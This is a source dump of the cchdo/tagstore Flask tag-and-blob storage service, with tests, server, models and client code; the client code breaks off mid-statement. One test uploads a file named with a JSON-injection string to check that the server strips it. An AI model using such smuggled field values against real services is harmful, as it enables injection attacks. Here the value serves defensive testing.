dict(q=json.dumps(dict(filters=filters)))\n response = self.http('get', self.api_data_endpoint, data=params)\n self.assert_200(response)\n\n filters = [dict(name='tags', op='not_any', val=dict(name='tag', op='eq', val='d'))]\n params = dict(q=json.dumps(dict(filters=filters)))\n response = self.http('get', self.api_data_endpoint, data=params)\n self.assert_200(response)\n\n def test_ofs_get(self):\n filecontents = 'btlex'\n aaa = StringIO(filecontents)\n fname = 'propername'\n resp = self.http('post', self.api_ofs_endpoint,\n data={'blob': (aaa, fname)},\n content_type='multipart/form-data')\n self.assert_200(resp)\n data = json.loads(resp.data)\n self.assertEqual(data['fname'], fname)\n\n path = urlsplit(data['uri']).path\n resp = self.http('get', path)\n self.assert_200(resp)\n self.assertEqual(resp.data, filecontents)\n\n resp = self.http('head', path)\n self.assertEqual(resp.headers['content-length'], str(5))\n\n resp = self.http('get', path, headers={'X-As-Attachment': 'yes'})\n self.assertTrue(\n resp.headers['content-disposition'].startswith('attachment'))\n\n def test_ofs_put(self):\n filecontents0 = 'btlex'\n filecontents1 = 'btlex'\n aaa = StringIO(filecontents0)\n fname = 'propername'\n resp = self.http('post', self.api_ofs_endpoint,\n data={'blob': (aaa, fname)},\n content_type='multipart/form-data')\n self.assert_200(resp)\n data = json.loads(resp.data)\n path = urlsplit(data['uri']).path\n\n aaa = StringIO(filecontents1)\n fname = 'propername'\n resp = self.http('put', path,\n data={'blob': (aaa, fname)},\n content_type='multipart/form-data')\n self.assert_200(resp)\n\n path = urlsplit(data['uri']).path\n resp = self.http('get', path)\n self.assert_200(resp)\n self.assertEqual(resp.data, filecontents1)\n\n def test_ofs_delete(self):\n filecontents0 = 'btlex'\n aaa = StringIO(filecontents0)\n fname = 'propername'\n resp = self.http('post', self.api_ofs_endpoint,\n data={'blob': (aaa, fname)},\n content_type='multipart/form-data')\n self.assert_200(resp)\n data = json.loads(resp.data)\n path = urlsplit(data['uri']).path\n resp = self.http('delete', path)\n self.assert_status(resp, 204)\n resp = self.http('get', path)\n self.assert_404(resp)\n\n def test_ofs_create(self):\n aaa = StringIO('btlex')\n injected_name = '\", {\"injected\": \"json\"}'\n resp = self.http('post', self.api_ofs_endpoint,\n data={'blob': (aaa, injected_name)},\n content_type='multipart/form-data')\n self.assert_200(resp)\n data = json.loads(resp.data)\n self.assertEqual(data['fname'], '')\n\n # No longer a valid test due to use of processes\n @nottest\n def test_ofs_create_threadsafe(self):\n \"\"\"Creating OFSWrapper needs to be threadsafe.\n\n Make sure that initializing the PTOFS is guarded.\n\n \"\"\"\n ofs_dir = self.app.config['PTOFS_DIR']\n\n class ThreadX(Thread):\n def run(self):\n ofs = OFSWrapper(storage_dir=ofs_dir)\n\n threada = ThreadX(name='aaa')\n threadb = ThreadX(name='bbb')\n\n threada.start()\n threadb.start()\n\n threada.join()\n threadb.join()\n\n def test_ofs_create_processsafe(self):\n \"\"\"Creating OFSWrapper needs to be processsafe.\n\n Make sure that initializing the PTOFS is guarded.\n\n \"\"\"\n ofs_dir = self.app.config['PTOFS_DIR']\n\n def run():\n ofs = OFSWrapper(storage_dir=ofs_dir)\n\n pa = Process(target=run)\n pb = Process(target=run)\n pa.start()\n pb.start()\n\n pa.join()\n pb.join()\n\n # No longer a valid test due to use of processes\n @nottest\n def test_ofs_put_stream_threadsafe(self):\n \"\"\"Editing streams needs to be threadsafe.\n\n \"\"\"\n ofs_dir = self.app.config['PTOFS_DIR']\n\n class ThreadX(Thread):\n def run(self):\n ofs = OFSWrapper(storage_dir=ofs_dir)\n ofs.call('put_stream', 'hello', StringIO(current_thread().name))\n\n threada = ThreadX(name='aaa')\n threadb = ThreadX(name='bbb')\n\n threada.start()\n threadb.start()\n\n threada.join()\n threadb.join()\n\n ofs = OFSWrapper(storage_dir=ofs_dir)\n out = ofs.call('get_stream', 'hello')\n # Result is whichever thread was started later\n self.assertEqual(out.read(), 'bbb')\n\n def test_ofs_put_stream_processsafe(self):\n \"\"\"Editing streams needs to be processsafe.\n\n \"\"\"\n ofs_dir = self.app.config['PTOFS_DIR']\n\n def run(name):\n ofs = OFSWrapper(storage_dir=ofs_dir)\n ofs.call('put_stream', 'hello', StringIO(name))\n\n pa = Process(target=run, args=('aaa',))\n pb = Process(target=run, args=('bbb',))\n\n pa.start()\n pb.start()\n\n pa.join()\n pb.join()\n\n ofs = OFSWrapper(storage_dir=ofs_dir)\n out = ofs.call('get_stream', 'hello')\n # Result is whichever thread was started later\n self.assertEqual(out.read(), 'bbb')\n\n # No longer a valid test due to use of processes\n @nottest\n def test_ofs_threadsafe(self):\n \"\"\"Concurrent edits to the OFS may not be threadsafe.\n\n OFS pairtree operates on a PersistentState object that is shared.\n\n \"\"\"\n ofs_dir = self.app.config['PTOFS_DIR']\n pausea = Condition()\n bucket = 'testbucket'\n\n class ThreadA(Thread):\n def run(self):\n ofs = OFSWrapper(storage_dir=ofs_dir)\n\n _, json_payload = ofs.ofs._get_object(bucket)\n json_payload.update(dict(aaa=111))\n log.debug('aaa {0}'.format(json_payload))\n\n # Avoid deadlock when B correctly waits for PTOFS lock and A is\n # already holding it. Allow A to continue and release the lock.\n count = 0\n while count < 1 and not pausea.acquire(False):\n sleep(0.1)\n count += 1\n json_payload.sync()\n\n class ThreadB(Thread):\n def run(self):\n ofs = OFSWrapper(storage_dir=ofs_dir)\n _, json_payload = ofs.ofs._get_object(bucket)\n json_payload.update(dict(bbb=222))\n log.debug('bbb {0}'.format(json_payload))\n json_payload.sync()\n\n threada = ThreadA()\n threadb = ThreadB()\n\n # Set up ThreadA, the persistent state is read in\n pausea.acquire()\n threada.start()\n\n # Run ThreadB\n threadb.start()\n threadb.join()\n\n # Allow ThreadA to continue, the persistent state is written out.\n # If no locking, ThreadB's changes will be wiped out.\n pausea.release()\n threada.join()\n\n ofs = OFSWrapper(storage_dir=ofs_dir)\n _, json_payload = ofs.ofs._get_object(bucket)\n self.assertEqual(dict(aaa=111, bbb=222), json_payload)\n\n def test_ofs_processsafe(self):\n \"\"\"Concurrent edits to the OFS may not be processsafe.\n\n OFS pairtree operates on a PersistentState object that is shared.\n\n \"\"\"\n ofs_dir = self.app.config['PTOFS_DIR']\n pausea = mCondition()\n bucket = 'testbucket'\n\n def runa():\n ofs = OFSWrapper(storage_dir=ofs_dir)\n\n _, json_payload = ofs.ofs._get_object(bucket)\n json_payload.update(dict(aaa=111))\n log.debug('aaa {0}'.format(json_payload))\n\n # Avoid deadlock when B correctly waits for PTOFS lock and A is\n # already holding it. Allow A to continue and release the lock.\n count = 0\n while count < 1 and not pausea.acquire(False):\n sleep(0.1)\n count += 1\n json_payload.sync()\n\n def runb():\n ofs = OFSWrapper(storage_dir=ofs_dir)\n _, json_payload = ofs.ofs._get_object(bucket)\n json_payload.update(dict(bbb=222))\n log.debug('bbb {0}'.format(json_payload))\n json_payload.sync()\n\n pa = Process(target=runa)\n pb = Process(target=runb)\n\n # Set up aaa, the persistent state is read in\n pausea.acquire()\n pa.start()\n\n # Run bbb\n pb.start()\n pb.join()\n\n # Allow aaa to continue, the persistent state is written out.\n # If no locking, bbb's changes will be wiped out.\n pausea.release()\n pa.join()\n\n ofs = OFSWrapper(storage_dir=ofs_dir)\n _, json_payload = ofs.ofs._get_object(bucket)\n self.assertEqual(dict(aaa=111, bbb=222), json_payload)\n\n def test_gc(self):\n faa = StringIO('aaa')\n fbb = StringIO('bbb')\n fcc = StringIO('ccc')\n\n resp = self.http('post', self.api_ofs_endpoint,\n data={'blob': (faa, 'namea')},\n content_type='multipart/form-data')\n dataa = json.loads(resp.data)\n daa = Data(dataa['uri'], 'namea')\n db.session.add(daa)\n db.session.flush()\n resp = self.http('post', self.api_ofs_endpoint,\n data={'blob': (fbb, 'nameb')},\n content_type='multipart/form-data')\n datab = json.loads(resp.data)\n resp = self.http('post', self.api_ofs_endpoint,\n data={'blob': (fcc, 'namec')},\n content_type='multipart/form-data')\n datac = json.loads(resp.data)\n\n dcclabel = os.path.basename(datac['uri'])\n olddate = (datetime.now() - timedelta(seconds=61)).strftime('%Y-%m-%dT%H:%M:%S')\n _, json_payload = ofs.ofs._get_object(ofs.BUCKET_LABEL)\n json_payload[dcclabel]['_last_modified'] = olddate\n json_payload.sync()\n\n self.assertEqual(len(ofs.call('list_labels')), 3)\n # If a blob is referenced, do not delete it\n # If a blob was created in the last minute, do not delete it, it may not\n # have been associated with its Data resource yet.\n # else, go ahead and remove the blob...\n server.gc_ofs()\n self.assertEqual(sorted(ofs.call('list_labels')),\n sorted([os.path.basename(dataa['uri']),\n os.path.basename(datab['uri'])]))\n\n def test_zip(self):\n faa = StringIO('aaa')\n resp = self.http('post', self.api_ofs_endpoint,\n data={'blob': (faa, 'namea')},\n content_type='multipart/form-data')\n dataa = json.loads(resp.data)\n daa = Data(dataa['uri'], 'namea')\n db.session.add(daa)\n db.session.flush()\n dbb = Data('data:text/html,', 'nameb')\n db.session.add(dbb)\n db.session.flush()\n\n data_arcnames = [(daa.id, 'namea'), (dbb.id, 'namea/nameb')]\n fname = 'test.zip'\n data = dict(data_arcnames=data_arcnames,\n ofs_endpoint=self.api_ofs_endpoint, fname=fname)\n resp = self.http('post', self.api_zip_endpoint, data=json.dumps(data))\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(resp.headers['Content-Type'], 'application/zip')\n self.assertEqual(resp.headers['Content-Disposition'],\n 'attachment; filename={0}'.format(fname))\n\n\nclass TestClient(LiveServerTestCase):\n def create_app(self):\n app = _create_test_app(self)\n self.port = app.config['LIVESERVER_PORT']\n self.FQ_API_ENDPOINT = '{0}{1}'.format(self.get_server_url(),\n API_ENDPOINT)\n with app.app_context():\n db.create_all()\n return app\n\n def setUp(self):\n super(TestClient, self).setUp()\n try:\n rmtree(self.app.config['PTOFS_DIR'])\n except OSError:\n pass\n self.tstore = TagStoreClient(self.FQ_API_ENDPOINT)\n\n def tearDown(self):\n super(TestClient, self).tearDown()\n try:\n rmtree(self.app.config['PTOFS_DIR'])\n except OSError:\n pass\n with self.app.app_context():\n db.session.remove()\n db.drop_all()\n\n def test_create(self):\n uri = 'aaa'\n tags = [u'm', u'n']\n resp = self.tstore.create(uri, None, tags)\n self.assertEqual(resp.uri, uri)\n self.assertEqual(sorted(resp.tags), sorted(tags))\n\n uri = 'bbb'\n tags = [u'm', u'o']\n resp = self.tstore.create(uri, None, tags)\n self.assertEqual(resp.uri, uri)\n self.assertEqual(sorted(resp.tags), sorted(tags))\n\n resp = self.tstore.create('aaa', None, [u'm', u'n'])\n self.assertEqual(resp, None)\n\n def test_query_data(self):\n self.tstore.create('aaa', None, [u'm', u'n'])\n self.tstore.create('bbb', None, [u'm', u'o'])\n\n resp = self.tstore.query_data(Query.tags_any('eq', u'm'))\n self.assertEquals(len(resp), 2)\n\n def test_query_tags(self):\n self.tstore.create('aaa', None, [u'm', u'n:/asdf'])\n self.tstore.create('bbb', None, [u'm', u'n:/asdf/qwer'])\n\n resp = self.tstore.query_tags(['tag', 'eq', u'm'])\n self.assertEquals(len(resp), 1)\n\n resp = self.tstore.query_tags(['tag', 'like', u'n:/asdf%'])\n self.assertEquals(len(resp), 2)\n\n def test_edit(self):\n resp = self.tstore.create('aaa', None, [u'm', u'n'])\n\n d_id = resp.id\n\n resp = self.tstore.edit(d_id, 'aaa', '', [u'n'])\n self.assertEqual(resp.tags, [u'n'])\n\n def test_local_file(self):\n aaa = StringIO('btlex')\n self.tstore.create(aaa, None, [\n 'cruise:1234', 'datatype:bottle', 'format:exchange', 'preliminary'])\n\n bbb = StringIO('ctdex')\n resp = self.tstore.create(bbb, 'bname', [\n 'cruise:1234', 'datatype:ctd', 'format:exchange'])\n\n self.assertEqual(resp.fname, 'bname')\n\n ccc = StringIO('ctdzipnc')\n self.tstore.create(ccc, None, [\n 'cruise:1234', 'datatype:ctd', 'format:zip.netcdf'])\n\n response = self.tstore.query_data(Query.tags_any('eq', 'format:exchange'))\n self.assertEqual(len(response), 2)\n\n def test_local_file_http(self):\n \"\"\"HTTP headers should be set appropriately.\"\"\"\n aaa = StringIO('btlex')\n resp = self.tstore.create(aaa, None, [])\n resp = requests.get(resp.uri)\n headers = resp.headers\n self.assertTrue(headers['content-disposition'].endswith('blob'))\n self.assertEqual(headers['content-length'], '5')\n\n def test_delete_tag(self):\n resp = self.tstore.create('aaa', 'aname', ['taga'])\n tag = self.tstore.query_tags(['tag', 'eq', 'taga'])[0]\n t_id = tag.id\n with self.assertRaises(ValueError):\n self.tstore.delete_tag(t_id)\n self.tstore.edit(resp.id, 'aaa', 'aname', [])\n self.tstore.delete_tag(t_id)\n self.assertEqual(self.tstore.query_data(['fname', 'eq',\n 'aname'])[0].tags, [])\n\n def test_delete_local_file(self):\n ccc = StringIO('ctdzipnc')\n resp = self.tstore.create(ccc)\n d_id = resp.id\n self.tstore.delete(d_id)\n\n def test_query_response(self):\n for iii in range(20):\n self.tstore.create(u'test:{0}'.format(iii), None, [u'm'])\n resp = self.tstore.query_data(Query.tags_any('eq', u'm'))\n self.assertEqual(len(resp), 20)\n self.assertEqual(resp[15].uri, u'test:15')\n self.assertEqual(len(resp[9:15]), 6)\n self.assertEqual(resp[::-1][0].uri, u'test:19')\n with self.assertRaises(IndexError):\n resp[20]['uri']\n\n resp = self.tstore.query_data(Query.tags_any('eq', u'asdf'))\n self.assertEqual(len(resp), 0)\n resp = self.tstore.query_data(['uri', 'eq', u'test:19'], single=True)\n self.assertTrue(isinstance(resp, DataResponse))\n\n # More than one result\n with self.assertRaises(ValueError):\n self.tstore.query_data(Query.tags_any('eq', 'm'), single=True)\n\n resp = self.tstore.query_data(Query.tags_any('eq', 'm'), limit=1, single=True)\n self.assertTrue(isinstance(resp, DataResponse))\n\n resp = self.tstore.query_data(Query.tags_any('eq', u'asdf'), single=True)\n self.assertIsNone(resp)\n\n def test_data_response(self):\n \"\"\"Reading from a Data pointing to a URL should make the request.\"\"\"\n data = self.tstore.create(self.FQ_API_ENDPOINT + '/data')\n self.assertEqual(data.filename, 'data')\n self.assertEqual(data.open().read(1), '{')\n\n aaa = StringIO('hi')\n aaa.name = 'fname.txt'\n data = self.tstore.create(aaa)\n self.assertEqual(data.filename, aaa.name)\n self.assertEqual(data.open().read(2), 'hi')\n\n def test_edit_fname(self):\n aaa = StringIO('ctdzipnc')\n data = self.tstore.create(aaa, 'testname', ['tag0'])\n data = self.tstore.edit(data.id, data.uri, 'newname', data.tags)\n label = data.uri.split('/')[-1]\n with self.app.app_context():\n meta = ofs.call('get_metadata', label)\n self.assertEqual(meta['fname'], 'newname')\n\n def test_edit_tag(self):\n data = self.tstore.create('uri', 'fname', ['oldtag'])\n tag = self.tstore.query_tags(\n ['tag', 'eq', 'oldtag'], limit=1, single=True)\n tag = self.tstore.edit_tag(tag.id, 'newtag')\n self.assertEqual(tag.tag, 'newtag')\n\n def test_edit_tag_already_present(self):\n data = self.tstore.create('uri', 'fname', ['oldtag1', 'oldtag2'])\n tag = self.tstore.query_tags(\n ['tag', 'eq', 'oldtag1'], limit=1, single=True)\n tag = self.tstore.edit_tag(tag.id, 'oldtag2')\n self.assertEqual(tag.tag, 'oldtag2')\n tags = self.tstore.query_tags(['tag', 'eq', 'oldtag2'])\n self.assertEqual(tags[0].tag, 'oldtag2')\n tags = self.tstore.query_tags()\n self.assertEqual(len(tags), 1)\n\n def test_swap_tags(self):\n data = self.tstore.create('uri0', 'fname', ['oldtag1'])\n data = self.tstore.create('uri1', 'fname', ['oldtag2', 'oldtag1'])\n self.tstore.swap_tags('oldtag1', 'oldtag2')\n\n for data in self.tstore.query_data():\n self.assertEqual(data.tags, ['oldtag2'])\n\n self.tstore.swap_tags('oldtag2', 'oldtag1')\n\n for data in self.tstore.query_data():\n self.assertEqual(data.tags, ['oldtag1'])\n" }, { "alpha_fraction": 0.5693042278289795, "alphanum_fraction": 0.5743528604507446, "avg_line_length": 30.668603897094727, "blob_id": "aab1013cf696e588dd4e102c215b2647f21a7263", "content_id": "6c4be5e09a3072434dd68308c93e0e9c1c52939b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10894, "license_type": "no_license", "max_line_length": 84, "num_lines": 344, "path": "/tagstore/server.py", "repo_name": "cchdo/tagstore", "src_encoding": "UTF-8", "text": "from uuid import uuid4\nimport os.path\nimport logging\nfrom datetime import datetime, timedelta\nfrom mimetypes import guess_type\nfrom traceback import format_exc\nimport json\n\nlog = logging.getLogger(__name__)\n\nimport requests\n\nfrom flask import (\n Flask, g, Blueprint, current_app, jsonify, abort, request, send_file,\n make_response, Response, stream_with_context\n)\nfrom flask.ext.restless import APIManager, ProcessingException, search\n\nfrom werkzeug.local import LocalProxy\n\nfrom ofs.local import PTOFS\n\n\nfrom models import db, Tag, Data, tags\nfrom tempfilezipstream import TempFileStreamingZipFile, FileWrapper\nfrom patch.ptofs import patch_ptofs\nimport patch.restless\nfrom patch.lockfile import RLockFile, lockpath\n\n\nclass OFSWrapper(object):\n # 2-char bucket label for shallower pairtree\n BUCKET_LABEL = u'ts'\n\n def __init__(self, **kwargs):\n self.ofslock = RLockFile(lockpath(\n os.path.dirname(kwargs['storage_dir']), 'ofs'))\n self.init(**kwargs)\n\n def init(self, **kwargs):\n self.ofslock.acquire()\n self.ofs = PTOFS(uri_base='urn:uuid:', hashing_type='sha256', **kwargs)\n if self.BUCKET_LABEL not in self.ofs.list_buckets():\n self.bucket_id = self.ofs.claim_bucket(self.BUCKET_LABEL)\n else:\n self.bucket_id = self.BUCKET_LABEL\n self.ofslock.release()\n patch_ptofs(self.ofs.storage_dir)\n\n def call(self, method, *args, **kwargs):\n try:\n return getattr(self.ofs, method)(self.bucket_id, *args, **kwargs)\n except Exception as exc:\n log.error(u'{0} failed for {1}\\n{2}'.format(\n method, args, format_exc(exc)))\n raise\n\n\ndef get_ofs():\n ofs = getattr(g, '_ofs', None)\n if ofs is None:\n ofs = g._ofs = OFSWrapper(storage_dir=current_app.config['PTOFS_DIR'])\n return ofs\n\n\nofs = LocalProxy(get_ofs)\n\n\napi_v1_prefix = '/api/v1'\n\n\ndef replace_existing_tags(data):\n \"\"\"Replace any existing tags with the tag id.\"\"\"\n try:\n tags = data['tags']\n new_tags = [tag['tag'] for tag in tags]\n old_tags = Tag.query.filter(Tag.tag.in_(new_tags)).all()\n old_tag_ids = {}\n for tag in old_tags:\n old_tag_ids[tag.tag] = tag.id\n for tag in tags:\n ttt = tag['tag']\n if ttt in old_tag_ids:\n del tag['tag']\n tag['id'] = old_tag_ids[ttt]\n except KeyError:\n pass\n\n\ndef data_patch_single(instance_id=None, data=None, **kw):\n replace_existing_tags(data)\n\n\ndef is_uri_present_for_data(data):\n try:\n uri = data['uri']\n except KeyError:\n pass\n else:\n try:\n old = Data.query.filter_by(uri=uri).first()\n except Exception as err:\n log.error(err)\n raise\n if old:\n return True\n return False\n\n\ndef data_post(data=None, **kw):\n if is_uri_present_for_data(data):\n raise ProcessingException(description='Already present', code=409)\n\n replace_existing_tags(data)\n\n\nclass TagPatchSingle(object):\n new_tag = None\n\n @classmethod\n def pre(cls, instance_id=None, data=None, **kw):\n tag = Tag.query.filter_by(tag=data['tag']).first()\n if tag:\n # The \"new\" tag is really replacing with a preexisting tag.\n tags.update().where(\n tags.c.tag_id == instance_id).values(tag_id=tag.id)\n data['tag'] = 'newtag{0}'.format(tag.id)\n cls.new_tag = tag.id\n\n @classmethod\n def post(cls, result=None, **kw):\n if cls.new_tag != None:\n tag = Tag.query.get(result['id'])\n db.session.delete(tag)\n db.session.commit()\n newtag = Tag.query.get(cls.new_tag)\n result['id'] = newtag.id\n result['tag'] = newtag.tag\n cls.new_tag = None\n\n\ndef tag_delete(instance_id=None, **kw):\n any_referencing = db.session.query(tags.c.tag_id).filter(\n tags.c.tag_id == instance_id).count()\n if any_referencing:\n raise ProcessingException(description='Tag is referenced', code=409)\n\n\ndef _is_local_ofs(ofs_endpoint, uri):\n return uri.startswith(ofs_endpoint)\n\n\nzip_blueprint = Blueprint('zip', __name__, )\n\n\nclass DataWrapper(FileWrapper):\n def __init__(self, arcname, datum, ofs_endpoint):\n self._arcname = arcname\n self.uri = datum.uri\n self.is_local = _is_local_ofs(ofs_endpoint, self.uri)\n if self.is_local:\n self.uri = self.uri.split('/')[-1]\n\n @property\n def arcname(self):\n return self._arcname\n\n def get_stream(self):\n if self.is_local:\n stream = ofs.call('get_stream', self.uri)\n else:\n try:\n stream = requests.get(self.uri, stream=True).raw\n except requests.exceptions.RequestException:\n return None\n return stream\n\n def __len__(self):\n if self.is_local:\n metadata = ofs.call('get_metadata', self.uri)\n content_len = metadata['_content_length']\n else:\n try:\n resp = requests.head(self.uri)\n except requests.exceptions.RequestException:\n content_len = 0\n else:\n content_len = int(resp.headers.get('content-length', 0))\n return content_len\n\n\n@zip_blueprint.route('{0}/zip'.format(api_v1_prefix), methods=['POST'])\ndef zip():\n json = request.get_json()\n ofs_endpoint = json['ofs_endpoint']\n wrappers = []\n for did, arcname in json['data_arcnames']:\n wrappers.append(\n DataWrapper(arcname, Data.query.get(did), ofs_endpoint))\n fname = json['fname']\n\n szip = TempFileStreamingZipFile(wrappers)\n response = Response(stream_with_context(iter(szip)),\n mimetype='application/zip')\n response.headers['Content-Disposition'] = \\\n 'attachment; filename={0}'.format(fname)\n # no size can be given for the response because we can't know it in advance.\n return response\n\n\nstore_blueprint = Blueprint('storage', __name__, )\n\n\n@store_blueprint.route('{0}/ofs'.format(api_v1_prefix), methods=['POST'])\ndef ofs_create():\n fobj = request.files['blob']\n label = str(uuid4())\n ofs.call('put_stream', label, fobj)\n fname = fobj.filename\n ofs.call('update_metadata', label, {'fname': fname})\n return jsonify(dict(uri='{0}/{1}'.format(request.url, label), fname=fname))\n\n\ndef _update_http_headers(headers, metadata, as_attachment=False):\n fname = metadata.get('fname', '')\n disposition = 'inline'\n if as_attachment:\n disposition = 'attachment'\n headers['Content-Disposition'] = '{0}; filename={1}'.format(\n disposition, fname)\n mtype = guess_type(fname)[0]\n if not mtype:\n mtype = 'application/octet-stream'\n headers['Content-Type'] = metadata.get('_format', mtype)\n try:\n headers['Content-Length'] = metadata['_content_length']\n except KeyError:\n pass\n\n\n@store_blueprint.route('{0}/ofs/<label>'.format(api_v1_prefix),\n methods=['HEAD', 'GET', 'PUT', 'DELETE'])\ndef ofs_get(label):\n as_attachment = request.headers.get('X-As-Attachment', 'no') == 'yes'\n if request.method == 'HEAD':\n metadata = ofs.call('get_metadata', label)\n headers = {}\n _update_http_headers(headers, metadata, as_attachment)\n response = Response()\n response.headers.extend(headers)\n return response\n elif request.method == 'GET':\n try:\n stream = ofs.call('get_stream', label)\n except Exception as err:\n abort(404)\n else:\n try:\n metadata = ofs.call('get_metadata', label)\n except Exception as err:\n abort(500)\n else:\n # Flask converts the filename to an absolute path by prepending\n # the app directory which is incorrect. This is only used to add\n # etags, so just turn that off.\n resp = send_file(stream, add_etags=False)\n _update_http_headers(resp.headers, metadata, as_attachment)\n return resp\n elif request.method == 'PUT':\n try:\n fname = request.form['fname']\n except KeyError:\n pass\n else:\n params = {'fname': fname}\n ofs.call('update_metadata', label, params)\n\n if request.files:\n fobj = request.files['blob']\n ofs.call('put_stream', label, fobj)\n return make_response('', 200)\n elif request.method == 'DELETE':\n try:\n ofs.call('del_stream', label)\n except Exception:\n pass\n return make_response('', 204)\n\n\ndef gc_ofs():\n local_data = Data.query.filter(Data.uri.like('%/api/%/ofs/%')).all()\n present_labels = set([os.path.basename(ddd.uri) for ddd in local_data])\n for label in ofs.call('list_labels'):\n meta = ofs.call('get_metadata', label)\n mtime = datetime.strptime(meta['_last_modified'], '%Y-%m-%dT%H:%M:%S')\n grace_time = datetime.now() - timedelta(seconds=60)\n # Still within the grace period\n if mtime >= grace_time:\n continue\n if label in present_labels:\n continue\n ofs.call('del_stream', label)\n\n\ndef init_app(app):\n with app.app_context():\n db.init_app(app)\n\n app.register_blueprint(zip_blueprint)\n app.register_blueprint(store_blueprint)\n\n manager = APIManager(app, flask_sqlalchemy_db=db)\n manager.create_api(Data, url_prefix=api_v1_prefix,\n max_results_per_page=app.config['MAX_RESULTS_PER_PAGE_DATA'],\n preprocessors={\n 'PATCH_SINGLE': [data_patch_single],\n 'POST': [data_post],\n },\n methods=['GET', 'POST', 'PUT', 'PATCH', 'DELETE'],\n allow_patch_many=True)\n manager.create_api(Tag, url_prefix=api_v1_prefix,\n max_results_per_page=app.config['MAX_RESULTS_PER_PAGE_TAG'],\n preprocessors={\n 'PATCH_SINGLE': [TagPatchSingle.pre],\n 'DELETE': [tag_delete],\n },\n postprocessors={\n 'PATCH_SINGLE': [TagPatchSingle.post],\n },\n methods=['GET', 'PUT', 'PATCH', 'DELETE'],\n include_columns=['id', 'tag'],\n collection_name='tags')\n\n\nif __name__ == \"__main__\":\n import sys\n app = Flask(__name__)\n app.config.from_object('tagstore.settings.default')\n try:\n app.config.from_pyfile(sys.argv[1])\n except IndexError:\n raise IndexError(u'Please supply a configuration file.')\n init_app(app)\n app.run('0.0.0.0', processes=4)\n" }, { "alpha_fraction": 0.71875, "alphanum_fraction": 0.71875, "avg_line_length": 23, "blob_id": "da753d65187cf3eecc029adb96ac1c848d8467b7", "content_id": "4833b3812be19cb05c7e03ce61eaf1f766d6e280", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 96, "license_type": "no_license", "max_line_length": 37, "num_lines": 4, "path": "/settings.sample.py", "repo_name": "cchdo/tagstore", "src_encoding": "UTF-8", "text": "DEBUG = False\nTESTING = False\nSQLALCHEMY_DATABASE_URI = 'sqlite://'\nPTOFS_DIR = 'tagstore-data'\n" }, { "alpha_fraction": 0.611829936504364, "alphanum_fraction": 0.6275416016578674, "avg_line_length": 23.590909957885742, "blob_id": "6bf458b106cfeb4397b346e134f0786f504b27d7", "content_id": "fe39ab241834f6fdf4541ad98ca693fe48a9024a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1082, "license_type": "no_license", "max_line_length": 63, "num_lines": 44, "path": "/tagstore/models.py", "repo_name": "cchdo/tagstore", "src_encoding": "UTF-8", "text": "from flask.ext.sqlalchemy import SQLAlchemy\n\nfrom sqlalchemy import UniqueConstraint\n\n\ndb = SQLAlchemy()\n# NOTE: SQLite performance is surprisingly slow.\n\n\ntags = db.Table('tags',\n db.Column('tag_id', db.Integer, db.ForeignKey('tag.id')),\n db.Column('data_id', db.Integer, db.ForeignKey('data.id')),\n UniqueConstraint('tag_id', 'data_id'),\n)\n\n\nclass Data(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n\n # http://stackoverflow.com/questions/2659952\n uri = db.Column(db.Unicode(2**11), unique=True)\n\n fname = db.Column(db.Unicode(255))\n\n tags = db.relationship('Tag', secondary=tags,\n backref=db.backref('data', lazy='dynamic'))\n\n def __init__(self, uri, fname=None):\n self.uri = uri\n self.fname = fname\n\n def __repr__(self):\n return u'<Data {0!r}>'.format(self.uri)\n\n\nclass Tag(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n tag = db.Column(db.Unicode(2**9), unique=True)\n\n def __init__(self, tag):\n self.tag = tag\n\n def __repr__(self):\n return u'<Tag {0!r}>'.format(self.tag)\n" }, { "alpha_fraction": 0.8235294222831726, "alphanum_fraction": 0.8529411554336548, "avg_line_length": 12.600000381469727, "blob_id": "d282c2f7925f37df4c3335423f928acdb221987e", "content_id": "2f921e51f083115679ec3923e2f4760414190fbe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 68, "license_type": "no_license", "max_line_length": 22, "num_lines": 5, "path": "/requirements-server.txt", "repo_name": "cchdo/tagstore", "src_encoding": "UTF-8", "text": "Flask-SQLAlchemy\nFlask-Restless\nofs\nPairtree\ntempfilezipstream>=2.0\n" }, { "alpha_fraction": 0.5603407621383667, "alphanum_fraction": 0.5687016844749451, "avg_line_length": 34.21666717529297, "blob_id": "f08c7e869cac2d3758b186790a729acbe5c38c69", "content_id": "09d1bdb5d2518477faba19baf0727c2cb954536c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12678, "license_type": "no_license", "max_line_length": 83, "num_lines": 360, "path": "/tagstore/client.py", "repo_name": "cchdo/tagstore", "src_encoding": "UTF-8", "text": "import os.path\nfrom copy import copy\nfrom urlparse import urlunsplit, urlsplit\nfrom uuid import uuid4\nimport logging\n\nlog = logging.getLogger(__name__)\n\nimport requests\n\n\nimport json\n\n\nclass DataResponse(object):\n def __init__(self, client, json):\n self.client = client\n self.id = json['id']\n self.fname = json['fname']\n self.uri = json['uri']\n self.tags = [tag['tag'] for tag in json['tags']]\n\n @property\n def filename(self):\n return self.fname\n\n def open(self):\n return requests.get(self.uri, stream=True).raw\n\n def __repr__(self):\n return '<DataResponse({0}, {1}, {2}, {3})>'.format(\n self.id, self.uri, self.fname, self.tags)\n\n\nclass TagResponse(object):\n def __init__(self, client, json):\n self.client = client\n self.id = json['id']\n self.tag = json['tag']\n\n def __repr__(self):\n return '<TagResponse({0}, {1})>'.format(self.id, self.tag)\n\n\ndef ensure_response_status(response, *statuses):\n \"\"\"Assert that the requests response status is in statuses.\"\"\"\n assert response.status_code in statuses, '{0} {1} -> {2}'.format(\n response.request.method, response.request.url, response.status_code)\n\n\nclass QueryResponse(object):\n def __init__(self, client, endpoint, wrapper, params, preload=False):\n self.client = client\n self.endpoint = endpoint\n self.wrapper = wrapper\n self.params = params\n\n self.objects = []\n self.iii = 0\n self.page = 1\n\n self.get_page()\n if preload:\n while self.page < self.num_pages:\n self.page += 1\n # Some large number because fewer pages is better here\n self.get_page(self.page, self.client.preload_page_num_results)\n\n @classmethod\n def query(cls, endpoint, client, params):\n return requests.get(client._api_endpoint(endpoint), params=params,\n 